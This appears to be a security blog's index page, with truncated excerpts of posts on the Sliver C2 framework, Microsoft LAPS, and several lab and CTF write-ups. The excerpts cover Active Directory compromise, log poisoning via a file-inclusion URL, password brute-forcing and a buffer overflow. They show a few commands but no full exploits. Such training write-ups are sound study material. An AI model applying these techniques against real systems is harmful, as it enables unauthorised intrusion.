UnChleuHacker

Introducing SLIVER C2Sliver is an open-source command and control (C2) framework developed by Bishop Fox, which enables Red Team teams to simulate realistic attacks. It combines modularity, security and flexibility for modern penetration testing. What is a C2 framework?A C2 framework enables compromised machines to be remotely controlled by implants (or agents). These implants receive instructions from the C2 server, such as executing commands, transferring files or gathering information. The...

In most Active Directory infrastructures, each workstation has a local administrator account. This account is often poorly managed, and in some cases its password is identical on all machines. As a result, an attacker who compromises one of the machines can easily pivot on the network. To solve this problem, Microsoft introduced LAPS v1 (Local Administrator Password Solution) in 2015, then released a more comprehensive version in 2023. This article looks at how the two versions work, and the ...

User enumerationWe start by running an nmap scan: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185...

Hybrid is an Active Directory chain containing a Windows machine and a Linux machine. Initial access is gained by compromising the Linux machine, then the domain can be compromised using an ADCS attack. EnumerationWe start by running an nmap scan on the ips provided. 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374┌──(kali㉿kali)-[~/ctf/vulnlab/hybrid]└─$ nmap -A -iL ipsStarting Nmap 7.94SVN ( https://nm...

Heron is a medium-difficulty lab. The scenario assumes an initial compromise on a Linux machine attached to a domain, requiring a pivot to a domain controller in an attempt to compromise it. EnumerationLet’s start with the usual Nmap scan:The scan shows that 10.10.168.69 has no accessible ports, probably due to a firewall. On the other hand, 10.10.168.70 has port 22 open. This suggests that we should start by connecting to the Linux machine via SSH.The Wiki page tells us that this is a suppos...

SynthesisTea is an Active Directory chain containing 2 machines to be compromised. Initial access is gained by exploiting a CI/CD runner on a Gitea instance, and full domain compromise is possible through the WSUS connection of the domain controller. Initial enumerationLet’s start with an nmap scan of both machines.It looks like we’ve got a domain controller that isn’t behind a firewall and a machine hosting web services.We can retrieve the names of both machines using NetExec : We add t...

Initial accessThanks to the nmap scan, we quickly discover that one of the servers hosts an xampp server. By listing its directories, we discover a website:After browsing the site, we notice that it is potentially vulnerable to a BIA:This is confirmed by accessing the server log on the following link: http://10.10.162.134/dev/index.html?view=C:/xampp/apache/logs/access.log In this way, you can gain access to the machine by log poisoning. To do this, we send a request with php code to the user...

EnumerationEnumeration of open ports using nmap : Looking at the smb share, we see that it is possible to connect to the share using the guest account : A log1.txt file is then retrieved from the anonymous share, which appears to contain passwords:Listing the web server folders with dirb, we come across a mail server connection page: Mail server accessUsing hydra and the log1.txt file, we find the password for the milesdyson account (name found when enumerating smb shares). This gives us acc...

ObjectiveExploit a buffer overflow vulnerability in an application by taking control of the EIP register and executing shellcode. 1. connect to the target and launch vulnserverRDP connection to target : 1rdesktop -u IEUser -p 'Passw0rd!' 172.16.5.120 Launching vulnserver with : 1vulnserver.exe 9999 Interacting with the server from our machine, we notice that depending on how we type the command and what we send, we get different responses. 2. Fuzzing with SPIKECreate a trun.spk sc...

We start with an nmap scan We can see that the open ports correspond to those of a Windows machine, which is confirmed by visiting the web site on port 80: We start by trying to enumerate smb shares with the guest account: Note that you have read and write rights on a share. Using impacket-smbclient, we discover a password.txt file containing base64 : By decoding it with CyberChef, we obtain Bob’s and Bill’s identifiers: After trying to use these accounts to access other parts of the serve...